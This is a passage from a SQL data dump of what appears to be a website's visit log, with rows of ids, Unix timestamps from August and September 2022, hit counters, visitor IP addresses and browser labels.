,0,0,'207.46.13.7','other'),(564721,1660626117,1,1,0,0,'65.108.103.211','chrome'),(564722,1660631576,2,2,0,0,'209.141.51.222','chrome'),(564723,1660631790,2,2,0,0,'209.141.41.193','chrome'),(564724,1660632752,1,0,1,0,'66.249.70.37',''),(564725,1660635279,2,2,0,0,'205.185.121.69','chrome'),(564726,1660635644,2,2,0,0,'205.185.116.89','chrome'),(564727,1660635842,2,2,0,0,'209.141.36.112','chrome'),(564728,1660635941,2,2,0,0,'104.28.210.57','chrome'),(564729,1660636085,1,1,0,0,'194.38.20.161','other'),(564730,1660636294,2,2,0,0,'209.141.41.193','chrome'),(564731,1660636398,2,2,0,0,'209.141.49.169','chrome'),(564732,1660640817,1,1,0,0,'65.21.93.24','chrome'),(564733,1660658319,1,1,0,0,'91.196.178.169','chrome'),(564734,1660658807,1,1,0,0,'66.249.70.41','chrome'),(564735,1660674016,1,1,0,0,'65.21.206.46','chrome'),(564736,1660675259,1,1,0,0,'207.46.13.96','other'),(564737,1660676754,1,1,0,0,'168.119.60.81','chrome'),(564738,1660677389,1,1,0,0,'207.55.244.15','chrome'),(564739,1660678366,1,1,0,0,'66.249.70.41','chrome'),(564740,1660679431,1,1,0,0,'66.249.70.39','chrome'),(564741,1660683522,1,1,0,0,'184.94.240.88','firefox'),(564742,1660687361,1,0,1,0,'66.249.70.41',''),(564743,1660688667,1,0,1,0,'66.249.70.41',''),(564744,1660719696,1,0,1,0,'66.249.70.37',''),(564745,1660721595,2,2,0,0,'205.185.121.69','chrome'),(564746,1660722010,2,2,0,0,'209.141.55.120','chrome'),(564747,1660729744,1,1,0,0,'52.12.79.93','chrome'),(564748,1660730039,1,1,0,0,'66.249.70.39','chrome'),(564749,1660730461,1,1,0,0,'144.22.245.160','firefox'),(564750,1660748514,1,1,0,0,'207.46.13.7','other'),(564751,1660752055,1,1,0,0,'199.244.88.231','chrome'),(564752,1660756731,1,0,1,0,'66.249.70.39',''),(564753,1660768141,2,2,0,0,'209.141.36.112','chrome'),(564754,1660772307,1,1,0,0,'66.249.70.37','chrome'),(564755,1660786760,1,1,0,0,'207.244.98.106','chrome'),(564756,1660795267,1,1,0,0,'207.46.13.5','other'),(564757,1660800598,5,5,0,0,'92.205.56.212','chrome'),(564758,1660804824,1,0,1,0,'66.249.70.41',''),(564759,1660812786,1,0,1,0,'66.249.70.37',''),(564760,1660813450,1,1,0,0,'20.0.61.145','chrome'),(564761,1660815706,1,1,0,0,'66.249.70.39','chrome'),(564762,1660819167,1,1,0,0,'194.38.20.161','other'),(564763,1660825029,1,1,0,0,'185.81.157.112','other'),(564764,1660827168,1,1,0,0,'66.249.70.37','chrome'),(564765,1660838823,1,1,0,0,'66.249.70.37','chrome'),(564766,1660839061,1,1,0,0,'66.249.70.39','chrome'),(564767,1660846455,1,1,0,0,'157.55.39.45','other'),(564768,1660850549,1,1,0,0,'157.55.39.45','other'),(564769,1660862841,1,1,0,0,'5.45.207.142','other'),(564770,1660863308,1,1,0,0,'142.93.132.111','firefox'),(564771,1660881729,5,5,0,0,'134.122.7.10','chrome'),(564772,1660890834,1,0,1,0,'66.249.70.37',''),(564773,1660909741,1,1,0,0,'157.55.39.45','other'),(564774,1660915797,1,1,0,0,'66.249.70.41','chrome'),(564775,1660919049,1,1,0,0,'148.153.98.52','chrome'),(564776,1660919145,1,1,0,0,'217.198.191.199','chrome'),(564777,1660920466,1,0,1,0,'66.249.70.39',''),(564778,1660936106,1,1,0,0,'194.38.20.161','other'),(564779,1660939674,1,1,0,0,'65.21.206.43','chrome'),(564780,1660940801,1,1,0,0,'51.142.189.23','chrome'),(564781,1660942889,1,1,0,0,'91.196.178.124','chrome'),(564782,1660942914,1,1,0,0,'173.252.111.120','other'),(564784,1660942915,1,1,0,0,'173.252.111.22','other'),(564785,1660942917,1,1,0,0,'173.252.111.118','other'),(564786,1660942921,1,1,0,0,'173.252.111.2','other'),(564787,1660949540,1,1,0,0,'65.21.206.44','chrome'),(564788,1660956128,1,0,1,0,'66.249.70.37',''),(564789,1660956866,1,1,0,0,'66.249.70.41','chrome'),(564790,1660957722,1,1,0,0,'66.249.70.37','chrome'),(564791,1660962354,1,0,1,0,'66.249.70.39',''),(564792,1660965025,1,0,1,0,'66.249.70.41',''),(564793,1660979384,1,0,1,0,'66.249.70.37',''),(564794,1660981303,1,0,1,0,'66.249.70.39',''),(564795,1660981793,2,1,1,0,'66.249.70.37',''),(564796,1660990955,1,1,0,0,'194.60.77.45','chrome'),(564797,1660996987,2,1,1,0,'66.249.66.61',''),(564798,1660998365,1,1,0,0,'31.13.127.118','other'),(564799,1661031891,1,1,0,0,'51.142.88.99','chrome'),(564800,1661036327,1,1,0,0,'207.46.13.96','other'),(564801,1661052752,1,1,0,0,'185.220.103.117','other'),(564802,1661062701,1,1,0,0,'194.38.20.161','other'),(564803,1661064583,1,0,1,0,'66.249.66.59',''),(564804,1661073090,1,1,0,0,'184.94.240.88','firefox'),(564805,1661079619,1,1,0,0,'66.249.66.61','chrome'),(564806,1661087328,1,1,0,0,'65.21.206.43','chrome'),(564807,1661096789,1,1,0,0,'66.249.66.29','chrome'),(564808,1661101932,1,1,0,0,'69.63.184.2','other'),(564809,1661104798,1,1,0,0,'66.249.66.129','chrome'),(564810,1661122952,1,1,0,0,'20.0.61.145','chrome'),(564811,1661129451,1,0,1,0,'66.249.66.207',''),(564812,1661129452,1,1,0,0,'66.249.66.57','chrome'),(564813,1661145194,1,1,0,0,'66.249.66.57','chrome'),(564814,1661147157,1,0,1,0,'66.249.66.57',''),(564815,1661155350,2,0,2,0,'66.249.66.57',''),(564816,1661161345,1,1,0,0,'35.90.111.183','chrome'),(564817,1661161350,1,1,0,0,'54.200.205.171','chrome'),(564818,1661161362,1,1,0,0,'35.88.232.61','chrome'),(564819,1661161376,2,2,0,0,'18.237.128.152','chrome'),(564820,1661163469,1,1,0,0,'207.46.13.5','other'),(564821,1661166905,1,0,1,0,'66.249.66.59',''),(564822,1661174006,2,2,0,0,'20.203.177.98','other'),(564823,1661175538,1,1,0,0,'51.142.88.99','chrome'),(564824,1661178360,1,1,0,0,'66.249.66.57','chrome'),(564825,1661178384,1,0,1,0,'66.249.66.92',''),(564826,1661183589,1,1,0,0,'185.49.20.77','firefox'),(564827,1661185466,1,1,0,0,'207.46.13.71','other'),(564828,1661186191,1,1,0,0,'66.249.66.207','chrome'),(564829,1661187732,1,1,0,0,'194.38.20.161','other'),(564830,1661219831,1,1,0,0,'66.249.66.57','chrome'),(564831,1661221787,1,0,1,0,'45.142.122.213',''),(564832,1661232280,2,2,0,0,'167.94.138.46','other'),(564833,1661242013,1,1,0,0,'66.249.66.59','chrome'),(564834,1661248982,1,1,0,0,'34.221.148.232','chrome'),(564835,1661249022,2,2,0,0,'34.220.38.235','chrome'),(564836,1661250345,1,1,0,0,'20.121.65.120','chrome'),(564837,1661252201,1,1,0,0,'34.223.207.44','chrome'),(564838,1661252240,1,1,0,0,'35.92.16.228','chrome'),(564839,1661252962,1,1,0,0,'31.13.127.12','other'),(564840,1661254258,1,1,0,0,'65.21.206.46','chrome'),(564841,1661259273,1,0,1,0,'66.249.66.158',''),(564842,1661271362,1,1,0,0,'190.92.158.187','other'),(564844,1661271363,1,1,0,0,'190.92.158.187','chrome'),(564847,1661277650,1,1,0,0,'66.249.66.209','chrome'),(564848,1661299954,1,1,0,0,'90.156.168.190','chrome'),(564849,1661300030,1,1,0,0,'20.121.65.120','chrome'),(564850,1661300919,1,1,0,0,'76.72.172.167','firefox'),(564851,1661306685,5,5,0,0,'3.138.138.255','chrome'),(564852,1661323811,1,1,0,0,'51.158.108.61','other'),(564853,1661327171,1,1,0,0,'91.215.145.58','chrome'),(564854,1661334196,1,1,0,0,'54.149.104.88','chrome'),(564855,1661334252,1,1,0,0,'35.89.105.52','chrome'),(564856,1661339144,3,1,2,0,'66.249.66.59',''),(564857,1661342668,1,1,0,0,'66.249.66.27','chrome'),(564858,1661344157,1,1,0,0,'20.121.65.120','chrome'),(564859,1661344525,1,1,0,0,'213.95.15.77','other'),(564860,1661347760,1,1,0,0,'194.38.20.161','other'),(564861,1661353061,1,1,0,0,'66.249.66.57','chrome'),(564862,1661359514,1,1,0,0,'66.249.66.211','chrome'),(564863,1661359667,1,0,1,0,'66.249.66.129',''),(564864,1661364169,1,1,0,0,'2.184.67.138','firefox'),(564865,1661364667,1,0,1,0,'66.249.66.211',''),(564866,1661366660,1,1,0,0,'205.169.39.6','chrome'),(564867,1661367741,1,0,1,0,'66.249.66.93',''),(564868,1661367958,1,1,0,0,'66.249.66.23','chrome'),(564869,1661369419,1,1,0,0,'66.249.66.209','chrome'),(564870,1661369439,1,1,0,0,'66.249.66.207','chrome'),(564871,1661369667,1,0,1,0,'66.249.66.211',''),(564872,1661370269,1,1,0,0,'87.250.224.35','other'),(564873,1661370277,1,1,0,0,'213.180.203.5','other'),(564874,1661389226,2,2,0,0,'65.154.226.220','chrome'),(564875,1661405039,1,1,0,0,'66.249.66.57','chrome'),(564876,1661413316,1,1,0,0,'66.249.66.59','chrome'),(564877,1661415637,1,1,0,0,'207.46.13.5','chrome'),(564878,1661416557,1,1,0,0,'66.249.66.57','chrome'),(564879,1661419595,1,0,1,0,'66.249.66.59',''),(564880,1661432957,2,2,0,0,'91.196.178.169','chrome'),(564881,1661440332,1,1,0,0,'185.181.61.24','chrome'),(564882,1661448871,1,1,0,0,'45.32.251.180','firefox'),(564883,1661451488,1,0,1,0,'66.249.66.211',''),(564884,1661451494,1,1,0,0,'66.249.66.159','chrome'),(564885,1661453304,1,0,1,0,'66.249.66.158',''),(564886,1661455557,1,0,1,0,'66.249.66.61',''),(564887,1661455558,1,1,0,0,'66.249.66.25','chrome'),(564888,1661455831,1,1,0,0,'20.121.65.120','chrome'),(564889,1661482370,1,1,0,0,'20.163.120.201','firefox'),(564890,1661483000,1,1,0,0,'66.249.66.207','chrome'),(564891,1661493665,1,1,0,0,'157.55.39.74','other'),(564892,1661494051,1,0,1,0,'66.249.66.61',''),(564893,1661512506,5,5,0,0,'159.65.4.107','chrome'),(564894,1661516483,2,2,0,0,'20.127.156.93','other'),(564895,1661526811,1,1,0,0,'157.55.39.74','other'),(564896,1661528437,1,0,1,0,'66.249.66.61',''),(564897,1661541659,1,1,0,0,'194.38.20.161','other'),(564898,1661543497,1,1,0,0,'66.249.66.29','chrome'),(564900,1661544168,1,1,0,0,'66.249.66.92','chrome'),(564901,1661547806,1,0,1,0,'66.249.66.159',''),(564902,1661548524,1,1,0,0,'167.235.139.202','other'),(564903,1661552081,1,1,0,0,'65.21.206.45','chrome'),(564904,1661561273,1,0,1,0,'66.249.66.59',''),(564905,1661569045,1,1,0,0,'54.212.234.182','chrome'),(564906,1661581580,2,2,0,0,'137.74.27.104','firefox'),(564907,1661582987,1,1,0,0,'66.249.66.57','chrome'),(564908,1661592233,1,1,0,0,'66.249.66.57','chrome'),(564909,1661593929,1,1,0,0,'173.252.107.14','other'),(564910,1661593930,1,1,0,0,'173.252.107.22','other'),(564911,1661593931,1,1,0,0,'173.252.107.1','other'),(564912,1661596010,1,1,0,0,'207.46.13.71','other'),(564913,1661596631,4,4,0,0,'193.29.220.11','chrome'),(564914,1661600838,1,1,0,0,'66.249.66.57','chrome'),(564915,1661603580,1,1,0,0,'157.55.39.74','other'),(564916,1661605038,5,5,0,0,'92.222.212.68','chrome'),(564917,1661624169,1,1,0,0,'36.94.142.166','firefox'),(564918,1661636965,1,1,0,0,'65.21.206.45','chrome'),(564919,1661641519,1,0,1,0,'66.249.66.199',''),(564920,1661641892,1,1,0,0,'66.249.66.199','chrome'),(564921,1661649796,1,1,0,0,'173.252.107.23','other'),(564922,1661662001,1,0,1,0,'66.249.66.59',''),(564923,1661662156,1,1,0,0,'194.38.20.161','other'),(564924,1661671077,1,0,1,0,'66.249.66.57',''),(564925,1661671131,1,1,0,0,'66.249.66.61','chrome'),(564926,1661675410,1,0,1,0,'66.249.66.57',''),(564927,1661679610,1,1,0,0,'54.245.145.141','chrome'),(564928,1661679791,1,1,0,0,'52.42.198.76','chrome'),(564929,1661679814,2,2,0,0,'18.236.230.75','chrome'),(564930,1661679903,1,1,0,0,'157.55.39.45','other'),(564931,1661703022,1,1,0,0,'128.199.205.115','firefox'),(564932,1661708609,1,1,0,0,'193.0.221.238','chrome'),(564933,1661712702,1,1,0,0,'91.196.178.28','chrome'),(564934,1661715926,1,1,0,0,'173.252.111.3','other'),(564935,1661716576,1,1,0,0,'91.196.178.28','chrome'),(564936,1661730422,1,1,0,0,'66.249.66.201','chrome'),(564937,1661736727,1,1,0,0,'66.249.66.25','chrome'),(564938,1661750395,1,0,1,0,'66.249.66.59',''),(564939,1661755751,1,0,1,0,'66.249.66.61',''),(564940,1661762723,1,1,0,0,'95.108.213.57','other'),(564941,1661763854,1,0,1,0,'66.249.66.59',''),(564942,1661766781,1,1,0,0,'54.218.252.0','chrome'),(564943,1661766816,1,1,0,0,'35.92.135.163','chrome'),(564944,1661770934,1,0,1,0,'66.249.66.57',''),(564945,1661770972,1,1,0,0,'66.249.66.59','chrome'),(564946,1661772176,1,1,0,0,'31.13.103.6','other'),(564947,1661779213,1,1,0,0,'194.38.20.161','other'),(564948,1661779903,1,0,1,0,'66.249.66.203',''),(564949,1661784280,1,1,0,0,'66.249.66.203','chrome'),(564950,1661787663,1,1,0,0,'66.249.66.25','chrome'),(564951,1661787686,1,0,1,0,'66.249.66.92',''),(564952,1661789430,1,0,1,0,'66.249.66.203',''),(564953,1661789436,1,1,0,0,'66.249.66.92','chrome'),(564954,1661792272,1,1,0,0,'173.252.107.8','other'),(564955,1661793822,1,1,0,0,'87.250.224.118','other'),(564956,1661794966,1,0,1,0,'66.249.66.27',''),(564957,1661794971,1,1,0,0,'66.249.66.57','chrome'),(564958,1661795298,1,1,0,0,'66.249.66.29','chrome'),(564959,1661802011,1,1,0,0,'66.249.66.59','chrome'),(564960,1661804517,1,1,0,0,'66.249.66.199','chrome'),(564961,1661805751,1,1,0,0,'5.255.253.168','other'),(564962,1661805788,1,1,0,0,'87.250.224.37','other'),(564963,1661806698,1,1,0,0,'185.39.144.147','other'),(564964,1661811827,1,1,0,0,'66.249.66.159','chrome'),(564965,1661814381,1,1,0,0,'66.249.66.92','chrome'),(564966,1661826025,1,0,1,0,'66.249.66.27',''),(564967,1661828296,1,1,0,0,'87.250.224.127','other'),(564968,1661832666,1,1,0,0,'95.108.213.21','other'),(564969,1661834584,1,1,0,0,'35.208.69.188','chrome'),(564970,1661839730,1,1,0,0,'88.155.43.54','chrome'),(564971,1661842384,1,0,1,0,'66.249.66.61',''),(564972,1661847599,1,1,0,0,'207.46.13.99','other'),(564973,1661848979,1,1,0,0,'66.249.66.61','chrome'),(564974,1661849573,1,0,1,0,'66.249.66.57',''),(564975,1661849835,1,1,0,0,'195.3.222.14','chrome'),(564976,1661850777,1,1,0,0,'64.225.1.172','other'),(564977,1661852408,1,1,0,0,'65.109.10.50','chrome'),(564978,1661863789,1,1,0,0,'180.249.164.253','firefox'),(564979,1661883997,1,1,0,0,'66.249.66.93','chrome'),(564980,1661923430,1,1,0,0,'194.38.20.161','other'),(564981,1661929562,1,0,1,0,'66.249.66.59',''),(564982,1661931904,14,14,0,0,'207.154.241.99','other'),(564983,1661931905,14,14,0,0,'46.101.189.134','other'),(564984,1661931906,1,1,0,0,'207.154.241.99','chrome'),(564985,1661931907,1,1,0,0,'46.101.189.134','chrome'),(564986,1661931910,1,1,0,0,'51.81.167.146','other'),(564987,1661931937,1,1,0,0,'179.43.169.181','firefox'),(564988,1661932634,1,1,0,0,'65.154.226.168','chrome'),(564989,1661932714,1,1,0,0,'205.169.39.12','chrome'),(564990,1661933868,1,1,0,0,'79.104.53.14','firefox'),(564991,1661938971,1,1,0,0,'39.110.218.101','other'),(564992,1661939036,1,1,0,0,'133.242.174.119','other'),(564993,1661939037,1,1,0,0,'133.242.140.127','other'),(564994,1661940927,2,2,0,0,'65.154.226.220','chrome'),(564995,1661942047,1,1,0,0,'178.93.178.116','chrome'),(564996,1661959685,1,1,0,0,'52.189.225.183','chrome'),(564997,1661966386,1,1,0,0,'91.219.60.108','firefox'),(564998,1661971185,2,2,0,0,'176.53.219.45','chrome'),(564999,1661971408,1,1,0,0,'185.237.217.11','chrome'),(565000,1661978569,2,2,0,0,'176.53.218.178','chrome'),(565001,1661982687,1,1,0,0,'207.46.13.71','chrome'),(565002,1661987150,1,1,0,0,'5.255.253.168','other'),(565003,1661989715,1,1,0,0,'168.138.147.77','firefox'),(565004,1662003423,2,2,0,0,'176.53.218.228','chrome'),(565005,1662005094,2,2,0,0,'45.90.63.253','chrome'),(565006,1662016069,1,0,1,0,'66.249.66.57',''),(565007,1662033691,1,1,0,0,'208.67.104.167','chrome'),(565008,1662035591,1,0,1,0,'66.249.70.37',''),(565009,1662040435,5,5,0,0,'51.142.236.112','chrome'),(565010,1662043058,1,1,0,0,'66.249.70.39','chrome'),(565011,1662050362,1,1,0,0,'194.38.20.161','other'),(565012,1662054654,1,1,0,0,'13.126.36.87','firefox'),(565013,1662056752,1,1,0,0,'199.244.88.219','chrome'),(565014,1662057486,2,2,0,0,'176.113.42.240','chrome'),(565015,1662065066,1,1,0,0,'150.136.250.6','chrome'),(565016,1662065079,2,2,0,0,'45.90.62.113','chrome'),(565017,1662067174,1,1,0,0,'52.189.225.183','chrome'),(565018,1662073573,1,1,0,0,'65.21.129.153','chrome'),(565019,1662089752,2,2,0,0,'176.53.216.23','chrome'),(565020,1662091444,2,2,0,0,'176.53.220.163','chrome'),(565021,1662097037,1,1,0,0,'157.55.39.74','other'),(565022,1662102532,1,0,1,0,'66.249.70.41',''),(565023,1662111407,1,1,0,0,'34.212.46.12','chrome'),(565024,1662111409,1,1,0,0,'52.88.38.34','chrome'),(565025,1662111427,1,1,0,0,'52.42.39.253','chrome'),(565026,1662111442,2,2,0,0,'35.91.144.179','chrome'),(565027,1662114671,1,1,0,0,'45.151.237.95','chrome'),(565028,1662116179,1,1,0,0,'87.250.224.14','other'),(565029,1662133085,1,1,0,0,'66.249.70.41','chrome'),(565030,1662143004,1,1,0,0,'46.211.78.14','chrome'),(565031,1662143290,1,1,0,0,'87.250.224.136','other'),(565032,1662145125,1,1,0,0,'66.249.70.39','chrome'),(565033,1662148077,1,0,1,0,'66.249.70.37',''),(565034,1662153794,1,1,0,0,'87.250.224.198','other'),(565035,1662154404,1,1,0,0,'185.181.60.189','chrome'),(565036,1662170643,1,1,0,0,'66.220.149.6','chrome'),(565037,1662170654,1,1,0,0,'66.220.149.118','chrome'),(565038,1662170656,1,1,0,0,'66.220.149.14','chrome'),(565039,1662177617,2,2,0,0,'45.90.60.90','chrome'),(565040,1662179451,2,2,0,0,'176.53.222.152','chrome'),(565041,1662181886,1,1,0,0,'194.38.20.161','other'),(565042,1662183295,1,1,0,0,'5.255.253.176','other'),(565043,1662185451,1,1,0,0,'87.250.224.127','other'),(565044,1662186625,1,1,0,0,'173.252.107.22','other'),(565045,1662187950,1,1,0,0,'161.97.88.147','firefox'),(565046,1662188734,2,1,1,0,'66.249.70.41',''),(565047,1662195866,1,1,0,0,'207.46.13.5','other'),(565048,1662199321,2,2,0,0,'35.161.36.211','chrome'),(565049,1662199354,2,2,0,0,'18.236.150.83','chrome'),(565050,1662202160,1,1,0,0,'87.250.224.41','other'),(565051,1662202341,1,1,0,0,'173.252.83.116','other'),(565052,1662208519,1,1,0,0,'66.249.70.37','chrome'),(565053,1662209662,2,1,1,0,'66.249.70.39',''),(565054,1662217104,1,0,1,0,'66.249.70.39',''),(565055,1662217625,2,2,0,0,'147.78.47.249','chrome'),(565056,1662219103,1,1,0,0,'31.13.127.19','other'),(565057,1662224844,1,1,0,0,'185.237.217.11','chrome'),(565058,1662225424,1,1,0,0,'66.249.70.39','chrome'),(565059,1662226130,1,1,0,0,'66.249.70.41','chrome'),(565060,1662236891,2,2,0,0,'45.140.185.39','firefox'),(565061,1662242086,1,1,0,0,'5.255.253.189','other'),(565062,1662250788,1,1,0,0,'34.220.163.235','firefox'),(565063,1662254407,1,1,0,0,'66.249.70.39','chrome'),(565064,1662258926,1,1,0,0,'66.249.70.41','chrome'),(565065,1662266258,1,1,0,0,'216.145.17.190','firefox'),(565066,1662267324,1,1,0,0,'51.120.9.23','firefox'),(565067,1662275456,1,0,1,0,'66.249.70.41',''),(565068,1662279114,1,1,0,0,'66.249.70.39','chrome'),(565069,1662283814,1,1,0,0,'52.13.123.110','chrome'),(565070,1662283824,1,1,0,0,'54.187.122.49','chrome'),(565071,1662283849,1,1,0,0,'35.91.183.102','chrome'),(565072,1662284466,1,1,0,0,'34.222.13.121','chrome'),(565073,1662285172,46,46,0,0,'65.109.4.0','chrome'),(565074,1662293101,1,1,0,0,'51.158.98.24','other'),(565075,1662312243,1,1,0,0,'79.137.64.70','firefox'),(565076,1662312297,1,1,0,0,'194.38.20.161','other'),(565077,1662328576,5,5,0,0,'188.165.202.227','chrome'),(565078,1662332756,1,1,0,0,'157.55.39.226','other'),(565079,1662334605,1,1,0,0,'66.249.70.41','chrome'),(565080,1662336565,1,1,0,0,'157.55.39.189','other'),(565081,1662343928,1,1,0,0,'157.55.39.189','other'),(565082,1662345220,1,1,0,0,'138.197.79.71','other'),(565083,1662346988,1,1,0,0,'128.199.159.238','chrome'),(565084,1662349802,1,1,0,0,'157.55.39.189','other'),(565085,1662353754,1,1,0,0,'66.249.70.41','chrome'),(565086,1662360711,1,0,1,0,'66.249.70.37',''),(565087,1662360740,1,1,0,0,'66.249.70.37','chrome'),(565088,1662361826,1,0,1,0,'66.249.70.37',''),(565089,1662365189,1,1,0,0,'51.15.251.143','other'),(565090,1662367847,1,1,0,0,'66.249.70.39','chrome'),(565091,1662369448,1,1,0,0,'157.55.39.189','other'),(565092,1662370301,1,1,0,0,'34.221.242.119','chrome'),(565093,1662370973,1,1,0,0,'87.250.224.44','other'),(565094,1662402357,1,1,0,0,'207.46.13.101','other'),(565095,1662407467,1,1,0,0,'66.249.70.39','chrome'),(565096,1662408139,1,1,0,0,'66.249.70.37','chrome'),(565097,1662412532,1,1,0,0,'66.249.70.37','chrome'),(565098,1662412620,1,0,1,0,'66.249.70.41',''),(565099,1662415924,1,0,1,0,'66.249.70.37',''),(565100,1662436284,1,0,1,0,'66.249.70.39',''),(565101,1662438485,1,1,0,0,'66.249.70.41','chrome'),(565102,1662441271,1,1,0,0,'31.13.127.23','other'),(565103,1662446538,1,0,1,0,'66.249.70.41',''),(565104,1662452855,1,1,0,0,'91.196.178.169','chrome'),(565105,1662458644,1,1,0,0,'193.123.115.34','firefox'),(565106,1662463703,1,1,0,0,'207.46.13.5','chrome'),(565107,1662471015,1,1,0,0,'66.249.66.57','chrome'),(565108,1662471784,1,1,0,0,'31.13.127.17','other'),(565109,1662486550,1,1,0,0,'66.249.66.59','chrome'),(565110,1662497398,1,1,0,0,'194.38.20.161','other'),(565111,1662501184,5,5,0,0,'3.141.4.183','chrome'),(565112,1662502587,48,48,0,0,'192.151.154.50','other'),(565113,1662502593,11,11,0,0,'192.151.154.50','chrome'),(565114,1662530488,1,1,0,0,'5.255.253.168','other'),(565115,1662531293,1,0,1,0,'66.249.66.59',''),(565116,1662532588,1,1,0,0,'5.255.253.176','other'),(565117,1662538104,1,1,0,0,'157.55.39.88','other'),(565118,1662543772,1,1,0,0,'207.46.13.47','chrome'),(565119,1662557052,1,1,0,0,'205.210.31.41','other'),(565120,1662560324,1,1,0,0,'31.13.127.17','other'),(565121,1662565266,2,2,0,0,'65.21.206.45','chrome'),(565122,1662576824,1,1,0,0,'103.171.180.139','firefox'),(565123,1662577613,1,1,0,0,'66.249.70.41','chrome'),(565124,1662587786,1,1,0,0,'20.196.152.56','chrome'),(565125,1662591800,1,1,0,0,'66.249.70.59','chrome'),(565126,1662591863,1,1,0,0,'157.55.39.90','other'),(565127,1662605438,1,0,1,0,'66.249.70.37',''),(565128,1662616025,1,0,1,0,'66.249.70.41',''),(565129,1662617681,1,1,0,0,'194.38.20.161','other'),(565130,1662628144,1,1,0,0,'66.249.70.41','chrome'),(565131,1662631256,1,1,0,0,'207.46.13.51','other'),(565132,1662633891,1,1,0,0,'87.250.224.50','other'),(565133,1662637737,1,1,0,0,'20.163.109.173','chrome'),(565134,1662656171,1,1,0,0,'196.44.176.39','firefox'),(565135,1662657622,1,1,0,0,'31.13.127.19','other'),(565136,1662691322,1,1,0,0,'20.163.109.173','chrome'),(565137,1662692435,1,1,0,0,'95.108.213.21','other'),(565138,1662694866,1,1,0,0,'87.250.224.149','other'),(565139,1662696181,1,1,0,0,'95.108.213.21','other'),(565140,1662700676,1,0,1,0,'66.249.66.59',''),(565141,1662700985,1,1,0,0,'66.249.66.57','chrome'),(565142,1662713635,1,1,0,0,'87.250.224.127','other'),(565143,1662719352,1,1,0,0,'87.250.224.127','other'),(565144,1662721043,1,1,0,0,'66.249.66.57','chrome'),(565145,1662734902,1,1,0,0,'95.108.213.21','other'),(565146,1662735075,1,1,0,0,'194.38.20.161','other'),(565147,1662737369,1,1,0,0,'87.250.224.14','other'),(565148,1662740015,1,1,0,0,'157.55.39.88','other'),(565149,1662741942,1,1,0,0,'80.77.135.125','firefox'),(565150,1662749099,1,1,0,0,'87.250.224.127','other'),(565151,1662749972,1,1,0,0,'87.250.224.14','other'),(565152,1662752014,1,1,0,0,'66.249.66.211','chrome'),(565153,1662752563,1,1,0,0,'95.108.213.21','other'),(565154,1662752612,1,1,0,0,'87.250.224.127','other'),(565155,1662756800,1,0,1,0,'66.249.66.82',''),(565156,1662757129,1,1,0,0,'207.46.13.51','other'),(565157,1662768545,1,1,0,0,'65.21.206.43','chrome'),(565158,1662776581,5,5,0,0,'20.168.19.138','chrome'),(565159,1662776877,3,3,0,0,'23.100.7.152','chrome'),(565160,1662778603,3,3,0,0,'147.78.47.249','chrome'),(565161,1662786314,1,0,1,0,'66.249.66.61',''),(565162,1662794066,1,1,0,0,'66.249.66.59','chrome'),(565163,1662795368,1,1,0,0,'198.235.24.10','other'),(565164,1662798814,1,1,0,0,'165.227.72.162','other'),(565165,1662802185,1,1,0,0,'87.250.224.127','other'),(565166,1662802457,1,1,0,0,'159.65.247.133','other'),(565167,1662803451,1,1,0,0,'128.199.126.249','chrome'),(565168,1662806788,1,1,0,0,'87.250.224.14','other'),(565169,1662811983,1,1,0,0,'207.46.13.51','other'),(565170,1662813782,1,1,0,0,'205.210.31.19','other'),(565171,1662817843,1,1,0,0,'205.210.31.177','other'),(565172,1662819045,2,2,0,0,'101.68.211.2','firefox'),(565173,1662826661,1,0,1,0,'20.121.211.92',''),(565174,1662830853,1,1,0,0,'5.255.253.168','other'),(565175,1662832666,1,1,0,0,'95.108.213.21','other'),(565176,1662833310,1,1,0,0,'185.41.152.173','other'),(565177,1662833402,1,1,0,0,'91.196.178.221','chrome'),(565178,1662840184,1,1,0,0,'87.250.224.127','other'),(565179,1662848865,1,1,0,0,'173.252.83.3','other'),(565180,1662857349,1,1,0,0,'207.46.13.52','other'),(565181,1662858844,1,1,0,0,'95.108.213.21','other'),(565182,1662873369,2,2,0,0,'20.199.123.174','chrome'),(565183,1662874271,1,1,0,0,'20.199.123.174','chrome'),(565184,1662878588,48,48,0,0,'20.199.123.174','other'),(565185,1662878592,11,11,0,0,'20.199.123.174','chrome'),(565186,1662883589,1,1,0,0,'95.108.213.27','other'),(565187,1662886251,1,1,0,0,'154.6.12.156','other'),(565188,1662888375,1,1,0,0,'207.46.13.52','other'),(565189,1662889265,1,1,0,0,'66.249.66.61','chrome'),(565190,1662889597,1,1,0,0,'35.90.16.215','chrome'),(565191,1662889599,1,1,0,0,'18.236.88.197','chrome'),(565192,1662889617,2,2,0,0,'54.186.94.236','chrome'),(565193,1662889626,2,2,0,0,'54.184.183.94','chrome'),(565194,1662894071,1,1,0,0,'5.255.253.142','other'),(565195,1662899558,2,2,0,0,'87.250.224.127','other'),(565196,1662904186,5,5,0,0,'35.211.201.242','chrome'),(565197,1662909357,1,1,0,0,'87.250.224.136','other'),(565198,1662912640,1,1,0,0,'184.94.240.88','firefox'),(565199,1662912894,1,1,0,0,'66.249.66.59','chrome'),(565200,1662913981,1,1,0,0,'205.210.31.154','other'),(565201,1662928307,1,1,0,0,'66.249.66.83','chrome'),(565202,1662929378,1,1,0,0,'205.210.31.184','other'),(565203,1662929753,1,0,1,0,'66.249.66.159',''),(565204,1662931236,1,1,0,0,'66.249.66.209','chrome'),(565205,1662932783,1,1,0,0,'87.250.224.127','other'),(565206,1662933833,1,1,0,0,'66.249.66.129','chrome'),(565207,1662944408,1,1,0,0,'87.250.224.50','other'),(565208,1662945725,1,1,0,0,'87.250.224.50','other'),(565209,1662946305,1,1,0,0,'5.181.97.88','chrome'),(565210,1662962812,1,0,1,0,'66.249.66.59',''),(565211,1662967047,1,1,0,0,'87.250.224.35','other'),(565212,1662973183,1,1,0,0,'213.180.203.76','other'),(565213,1662973257,1,1,0,0,'66.249.66.59','chrome'),(565214,1662974573,1,1,0,0,'31.13.127.19','other'),(565215,1662975321,1,1,0,0,'5.255.253.157','other'),(565216,1662976515,1,1,0,0,'34.219.53.139','chrome'),(565217,1662976519,1,1,0,0,'34.208.174.47','chrome'),(565218,1662976537,1,1,0,0,'35.90.32.89','chrome'),(565219,1662978107,1,1,0,0,'87.250.224.118','other'),(565220,1662978718,1,1,0,0,'66.249.66.61','chrome'),(565221,1662987563,1,0,1,0,'66.249.66.59',''),(565222,1662990441,2,2,0,0,'66.249.92.57','chrome'),(565223,1662995280,1,1,0,0,'52.189.225.183','chrome'),(565224,1663000980,1,0,1,0,'66.249.66.61',''),(565225,1663004588,1,1,0,0,'207.46.13.52','other'),(565226,1663009913,1,1,0,0,'46.18